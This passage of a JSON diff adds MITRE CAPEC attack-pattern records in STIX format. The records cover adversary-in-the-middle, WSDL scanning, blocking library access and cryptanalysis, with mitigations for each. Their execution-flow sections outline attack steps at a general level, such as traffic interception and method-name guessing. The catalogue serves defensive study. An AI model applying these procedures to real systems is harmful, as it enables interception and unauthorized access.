"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7e6b79fb-dad6-48d5-8cf7-178e70577c8a", + "target_ref": "attack-pattern--1dd1397d-816a-4093-86a6-cf28bb32e486", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary targets the communication between two components (typically client and server), in order to alter or obtain data from transactions. 
A general approach entails the adversary placing themself within the communication channel between the two components.\n ", + "external_references": [ + { + "external_id": "CAPEC-94", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/94.html" + }, + { + "external_id": "CWE-300", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/300.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "external_id": "CWE-593", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/593.html" + }, + { + "external_id": "CWE-287", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "description": "Adversary-in-the-Middle", + "external_id": "T1557", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1557" + }, + { + "description": "Man-in-the-middle attack", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Man-in-the-middle_attack" + }, + { + "description": "M. 
Bishop, Computer Security: Art and Science, 2003, Addison-Wesley", + "external_id": "REF-553", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Man-in-the-middle attack, Open Web Application Security Project (OWASP)", + "external_id": "REF-633", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-community/attacks/Man-in-the-middle_attack" + }, + { + "description": "Kyle Chivers, What is a man-in-the-middle attack?, 2020--03---26, NortonLifeLock Inc.", + "external_id": "REF-634", + "source_name": "reference_from_CAPEC", + "url": "https://us.norton.com/internetsecurity-wifi-what-is-a-man-in-the-middle-attack.html" + }, + { + "description": "Man in the middle (MITM) attack, Imperva", + "external_id": "REF-635", + "source_name": "reference_from_CAPEC", + "url": "https://www.imperva.com/learn/application-security/man-in-the-middle-attack-mitm/" + }, + { + "description": "Jerry Decime, Settling the score: taking down the Equifax mobile application, 2017--09---13", + "external_id": "REF-636", + "source_name": "reference_from_CAPEC", + "url": "https://www.linkedin.com/pulse/settling-score-taking-down-equifax-mobile-application-jerry-decime/" + } + ], + "id": "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Adversary in the Middle (AiTM)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_alternate_terms": [ + "Man-in-the-Middle / MITM", + "Person-in-the-Middle / PiTM", + "Monkey-in-the-Middle", + "Monster-in-the-Middle", + "On-path Attacker" + ], + "x_capec_can_follow_refs": [ + "attack-pattern--861cfb48-ba7c-4568-86c9-43ac6985ac65", + "attack-pattern--2a8a634e-cf1f-4b2e-9a71-1ab8e6bb16d0", + "attack-pattern--67cf8bc2-3d17-4ecf-b52e-febdb7804a37" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + 
"attack-pattern--8c806dfa-b8ca-45f9-9f97-09e4b5c1157b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "\n In 2017, security researcher Jerry Decime discovered that Equifax mobile applications were not leveraging HTTPS in all areas. Although authentication was properly utilizing HTTPS, in addition to validating the root of trust of the server certificate, other areas of the application were using HTTP to communicate. Adversaries could then conduct MITM attacks on rogue WiFi or cellular networks and hijack the UX. This further allowed the adversaries to prompt users for sensitive data, which could then be obtained in the plaintext response. [REF-636]\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Communication Mechanism: The adversary determines the nature and mechanism of communication between two components, looking for opportunities to exploit.

  2. Techniques
    Perform a sniffing attack and observe communication to determine a communication protocol.
    Look for application documentation that might describe a communication mechanism used by a target.

Experiment

  1. Position In Between Targets: The adversary inserts themself into the communication channel initially acting as a routing proxy between the two targeted components.

  2. Techniques
    Install spyware on a client that will intercept outgoing packets and route them to their destination as well as route incoming packets back to the client.
    Exploit a weakness in an encrypted communication mechanism to gain access to traffic. Look for outdated mechanisms such as SSL.

Exploit

  1. Use Intercepted Data Maliciously: The adversary observes, filters, or alters passed data of its choosing to gain access to sensitive information or to manipulate the actions of the two target components for their own purposes.

  2. Techniques
    Prevent some messages from reaching their destination, causing a denial of service.
", + "x_capec_extended_description": "\n Whenever one component attempts to communicate with the other (data flow, authentication challenges, etc.), the data first flows through the adversary, who has the opportunity to observe or alter it, before being passed on to the intended recipient as if it was never observed. This interposition is transparent leaving the two compromised components unaware of the potential corruption or leakage of their communications. The potential for these attacks yields an implicit lack of trust in communication or identify between two components.\n These attacks differ from Sniffing Attacks (CAPEC-157) since these attacks often modify the communications prior to delivering it to the intended recipient.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--9b939586-fbef-4343-94f0-0046124e3e7f", + "attack-pattern--ea07b1ea-c1b0-4923-8d25-a8fc39da040a", + "attack-pattern--9df3addd-7bea-44e5-be63-4cc46d64fbea", + "attack-pattern--797a5be6-23ff-41bb-be85-51a9976867dd", + "attack-pattern--558870ad-9433-4e39-a0b0-d9b5c4691862", + "attack-pattern--cd6af290-f89e-4238-95b3-6f06d05ed814" + ], + "x_capec_prerequisites": [ + "There are two components communicating with each other.", + "An attacker is able to identify the nature and mechanism of communication between the two target components.", + "An attacker can eavesdrop on the communication between the target components.", + "Strong mutual authentication is not used between the two target components yielding opportunity for attacker interposition.", + "The communication occurs in clear (not encrypted) or with insufficient and spoofable encryption." + ], + "x_capec_skills_required": { + "Medium": "This attack can get sophisticated since the attack may use cryptography." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure Public Keys are signed by a Certificate Authority", + "id": "course-of-action--7e959f1b-27b5-47ae-a7b5-4c2d7706b8f4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-94-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5264115d-5e8a-4dbd-95fe-60d77876319d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7e959f1b-27b5-47ae-a7b5-4c2d7706b8f4", + "target_ref": "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Encrypt communications using cryptography (e.g., SSL/TLS)", + "id": "course-of-action--6b5dd988-67a1-4705-bdfb-a93f761103d0", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-94-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6822ab84-ff48-490b-8bff-9eb89ae991ba", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--6b5dd988-67a1-4705-bdfb-a93f761103d0", + "target_ref": "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use Strong mutual authentication to always fully authenticate both ends of any communications channel.", + "id": "course-of-action--667b8791-5eee-4dfc-86ae-fb68a7b5b8ca", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-94-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3043134e-bd5e-43ae-93a4-4f2f31bda6cb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--667b8791-5eee-4dfc-86ae-fb68a7b5b8ca", + "target_ref": "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Exchange public keys using a secure channel", + "id": "course-of-action--45042a19-1cd7-40b5-a3bf-d96506a0cf28", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-94-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cbfe5c41-f0ba-4524-aeaa-5d46d305a1a7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--45042a19-1cd7-40b5-a3bf-d96506a0cf28", + "target_ref": "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets the WSDL interface made available by a web service. The attacker may scan the WSDL interface to reveal sensitive information about invocation patterns, underlying technology implementations and associated vulnerabilities. This type of probing is carried out to perform more serious attacks (e.g. parameter tampering, malicious content injection, command injection, etc.). WSDL files provide detailed information about the services ports and bindings available to consumers. For instance, the attacker can submit special characters or malicious content to the Web service and can cause a denial of service condition or illegal access to database records. 
In addition, the attacker may try to guess other private methods by using the information provided in the WSDL files.", + "external_references": [ + { + "external_id": "CAPEC-95", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/95.html" + }, + { + "external_id": "CWE-538", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/538.html" + }, + { + "description": "Walid Negm, Anatomy of a Web Services Attack, 2004--03---01, ForumSystems", + "external_id": "REF-554", + "source_name": "reference_from_CAPEC", + "url": "https://www.forumsys.com/wp-content/uploads/2014/01/Anatomy-of-a-Web-Services-Attack.pdf" + }, + { + "description": "Frank Coyle, Seven Steps to XML Mastery, 2006--08---25", + "external_id": "REF-555", + "source_name": "reference_from_CAPEC", + "url": "http://www.informit.com/articles/article.aspx?p=601349" + } + ], + "id": "attack-pattern--165b75a3-3e50-492c-8f1a-af979dc5af12", + "modified": "2021-10-21T00:00:00.000Z", + "name": "WSDL Scanning", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--49132d37-44e8-458c-a06e-0e5b9ac9bbd6" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "A WSDL interface may expose a function vulnerable to SQL Injection.", + "\n The Web Services Description Language (WSDL) allows a web service to advertise its capabilities by describing operations and parameters needed to access the service. 
As discussed in step 5 of this series, WSDL is often generated automatically, using utilities such as Java2WSDL, which takes a class or interface and builds a WSDL file in which interface methods are exposed as web services.\n Because WSDL generation often is automated, enterprising adversaries can use WSDL to gain insight into the both public and private services. For example, an organization converting legacy application functionality to a web services framework may inadvertently pass interfaces not intended for public consumption to a WSDL generation tool. The result will be SOAP interfaces that give access to private methods.\n Another, more subtle WSDL attack occurs when an enterprising attacker uses naming conventions to guess the names of unpublished methods that may be available on the server. For example, a service that offers a stock quote and trading service may publish query methods such as requestStockQuote in its WSDL. However, similar unpublished methods may be available on the server but not listed in the WSDL, such as executeStockQuote. A persistent adversary with time and a library of words and phrases can cycle thru common naming conventions (get, set, update, modify, and so on) to discover unpublished application programming interfaces that open doors into private data and functionality.\n Source : \"Seven Steps to XML Mastery, Step 7: Ensure XML Security\", Frank Coyle. See reference section.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Scan for WSDL Documents: The adversary scans for WSDL documents. The WDSL document written in XML is like a handbook on how to communicate with the web services provided by the target host. It provides an open view of the application (function details, purpose, functional break down, entry points, message types, etc.). This is very useful information for the adversary.

Experiment

  1. Analyze WSDL files: An adversary will analyze the WSDL files and try to find potential weaknesses by sending messages matching the pattern described in the WSDL file. The adversary could run through all of the operations with different message request patterns until a breach is identified.

Exploit

  1. Craft malicious content: Once an adversary finds a potential weakness, they can craft malicious content to be sent to the system. For instance the adversary may try to submit special characters and observe how the system reacts to an invalid request. The message sent by the adversary may not be XML validated and cause unexpected behavior.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "A client program connecting to a web service can read the WSDL to determine what functions are available on the server.", + "The target host exposes vulnerable functions within its WSDL interface." + ], + "x_capec_skills_required": { + "Low": "This attack can be as simple as reading WSDL and starting sending invalid request.", + "Medium": "This attack can be used to perform more sophisticated attacks (SQL injection, etc.)" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "It is important to protect WSDL file or provide limited access to it.", + "id": "course-of-action--2cfb5b02-2dbe-4bbb-93b6-d0829c53a835", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-95-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--eca4d328-57ff-446e-ad42-ccc2cef859ec", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2cfb5b02-2dbe-4bbb-93b6-d0829c53a835", + "target_ref": "attack-pattern--165b75a3-3e50-492c-8f1a-af979dc5af12", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Review the functions exposed by the WSDL interface (especially if you have used a tool to generate it). 
Make sure that none of them is vulnerable to injection.", + "id": "course-of-action--59dfec85-61f1-4800-8246-6586b0f18405", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-95-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4c5539c8-19a6-45b2-bcb9-4fb404dc382b", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--59dfec85-61f1-4800-8246-6586b0f18405", + "target_ref": "attack-pattern--165b75a3-3e50-492c-8f1a-af979dc5af12", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure the WSDL does not expose functions and APIs that were not intended to be exposed.", + "id": "course-of-action--60133447-62bd-43b7-a58c-27e99dacd061", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-95-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8b13c359-babb-4e00-bfc7-ea8f84451bfe", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--60133447-62bd-43b7-a58c-27e99dacd061", + "target_ref": "attack-pattern--165b75a3-3e50-492c-8f1a-af979dc5af12", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": 
"2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Pay attention to the function naming convention (within the WSDL interface). Easy to guess function name may be an entry point for attack.", + "id": "course-of-action--7744ac94-d428-48ef-9b81-ccac789d7e79", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-95-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7a99d577-7a8d-4c25-a919-00e88b344543", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7744ac94-d428-48ef-9b81-ccac789d7e79", + "target_ref": "attack-pattern--165b75a3-3e50-492c-8f1a-af979dc5af12", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Validate the received messages against the WSDL Schema. 
Incomplete solution.", + "id": "course-of-action--36790523-1c9a-42c0-97ff-726d74a27ad4", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-95-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e8c83203-1d4b-4007-9bfc-d9e5e4cd1040", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--36790523-1c9a-42c0-97ff-726d74a27ad4", + "target_ref": "attack-pattern--165b75a3-3e50-492c-8f1a-af979dc5af12", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An application typically makes calls to functions that are a part of libraries external to the application. These libraries may be part of the operating system or they may be third party libraries. It is possible that the application does not handle situations properly where access to these libraries has been blocked. 
Depending on the error handling within the application, blocked access to libraries may leave the system in an insecure state that could be leveraged by an attacker.", + "external_references": [ + { + "external_id": "CAPEC-96", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/96.html" + }, + { + "external_id": "CWE-589", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/589.html" + } + ], + "id": "attack-pattern--807e5b36-9da9-4be8-9f6e-5d8c7258cff5", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Block Access to Libraries", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--ec0de204-6b66-4c4f-a401-21afa72f3941" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Bypass Protection Mechanism" + ], + "Availability": [ + "Alter Execution Logic" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "A web-based system uses a third party cryptographic random number generation library that derives entropy from machine's hardware. This library is used in generation of user session ids used by the application. If the library is inaccessible, the application instead uses a software based weak pseudo random number generation library. An attacker of the system blocks access of the application to the third party cryptographic random number generation library (by renaming it). The application in turn uses the weak pseudo random number generation library to generate session ids that are predictable. An attacker then leverages this weakness to guess a session id of another user to perform a horizontal elevation of privilege escalation and gain access to another user's account." 
+ ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine what external libraries the application accesses.

Experiment

  1. Block access to the external libraries accessed by the application.

  2. Monitor the behavior of the system to see if it goes into an insecure/inconsistent state.

  3. If the system does go into an insecure/inconsistent state, leverage that to obtain information about the system functionality or data, elevate access control, etc. The rest of this attack will depend on the context and the desired goal.

", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "An application requires access to external libraries.", + "An attacker has the privileges to block application access to external libraries." + ], + "x_capec_skills_required": { + "Low": "Knowledge of how to block access to libraries, as well as knowledge of how to leverage the resulting state of the application based on the failed call." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that application handles situations where access to APIs in external libraries is not available securely. If the application cannot continue its execution safely it should fail in a consistent and secure fashion.", + "id": "course-of-action--e537380d-e149-4eca-9d47-bb2f507a166b", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-96-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--348327f8-a11a-4875-acca-449bc953ceb1", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e537380d-e149-4eca-9d47-bb2f507a166b", + "target_ref": "attack-pattern--807e5b36-9da9-4be8-9f6e-5d8c7258cff5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Cryptanalysis is a process of finding weaknesses in cryptographic algorithms and using these weaknesses to decipher the ciphertext without knowing 
the secret key (instance deduction). Sometimes the weakness is not in the cryptographic algorithm itself, but rather in how it is applied that makes cryptanalysis successful. An attacker may have other goals as well, such as: Total Break (finding the secret key), Global Deduction (finding a functionally equivalent algorithm for encryption and decryption that does not require knowledge of the secret key), Information Deduction (gaining some information about plaintexts or ciphertexts that was not previously known) and Distinguishing Algorithm (the attacker has the ability to distinguish the output of the encryption (ciphertext) from a random permutation of bits).", + "external_references": [ + { + "external_id": "CAPEC-97", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/97.html" + }, + { + "external_id": "CWE-327", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/327.html" + }, + { + "external_id": "CWE-1204", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1204.html" + }, + { + "external_id": "CWE-1240", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1240.html" + }, + { + "external_id": "CWE-1241", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1241.html" + }, + { + "external_id": "CWE-1279", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1279.html" + }, + { + "description": "Cryptanalysis", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Cryptanalysis" + }, + { + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "external_id": "REF-556", + "source_name": "reference_from_CAPEC", + "url": "http://en.wikipedia.org/wiki/Cryptanalysis" + } + ], + "id": "attack-pattern--f1336271-5f27-40de-a61b-aba6572d120f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Cryptanalysis", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + 
"type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--86a5e931-7f53-46fe-b6f0-c88498f6557f" + ], + "x_capec_child_of_refs": [ + "attack-pattern--30b081a0-bf20-432b-8211-a340bbd04731" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (In most cases, if cryptanalysis is successful at all, an adversary will not be able to decrypt the entire message, but instead will only be able to deduce some information about the plaintext. However, that may be sufficient for an adversary, depending on the context of the attack.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Hardware" + ], + "x_capec_example_instances": [ + "A very easy to understand example is a cryptanalysis technique called frequency analysis that can be successfully applied to the very basic classic encryption algorithms that performed mono-alphabetic substitution replacing each letter in the plaintext with its predetermined mapping letter from the same alphabet. This was considered an improvement over a more basic technique that would simply shift all of the letters of the plaintext by some constant number of positions and replace the original letters with the new letter with the resultant alphabet position. While mono-alphabetic substitution ciphers are resilient to blind brute force, they can be broken easily with nothing more than a pen and paper. Frequency analysis uses the fact that natural language is not random and mono-alphabetic substitution does not hide the statistical properties of the natural language. So if the letter \"E\" in an English language occurs with a certain known frequency (about 12.7%), whatever \"E\" was substituted with to get to the ciphertext, will occur with the similar frequency. Having this frequency information allows the cryptanalyst to quickly determine the substitutions and decipher the ciphertext. 
Frequency analysis techniques are not applicable to modern ciphers as they are all resilient to it (unless this is a very bad case of a homegrown encryption algorithm). This example is inapplicable to modern cryptographic ciphers but is here to illustrate a rudimentary example of cryptanalysis." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. An attacker discovers a weakness in the cryptographic algorithm or a weakness in how it was applied to a particular chunk of plaintext.

Exploit

  1. An attacker leverages the discovered weakness to decrypt, partially decrypt or infer some information about the contents of the encrypted message. All of that is done without knowing the secret key.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--63048cb5-6d42-4fa2-a0e1-eeff2ef2a34d", + "attack-pattern--9dded599-dd66-4a4c-8f17-6afb81c234f8" + ], + "x_capec_prerequisites": [ + "The target software utilizes some sort of cryptographic algorithm.", + "An underlying weaknesses exists either in the cryptographic algorithm used or in the way that it was applied to a particular chunk of plaintext.", + "The encryption algorithm is known to the attacker.", + "An attacker has access to the ciphertext." + ], + "x_capec_resources_required": [ + "Computing resource requirements will vary based on the complexity of a given cryptanalysis technique. Access to the encryption/decryption routines of the algorithm is also required." + ], + "x_capec_skills_required": { + "High": "Cryptanalysis generally requires a very significant level of understanding of mathematics and computation." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use proven cryptographic algorithms with recommended key sizes.", + "id": "course-of-action--722bfc5b-c0b1-457d-aa1b-4918cf8f3974", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-97-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--abc4a679-2285-4f45-82cd-1109211ab070", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--722bfc5b-c0b1-457d-aa1b-4918cf8f3974", + "target_ref": 
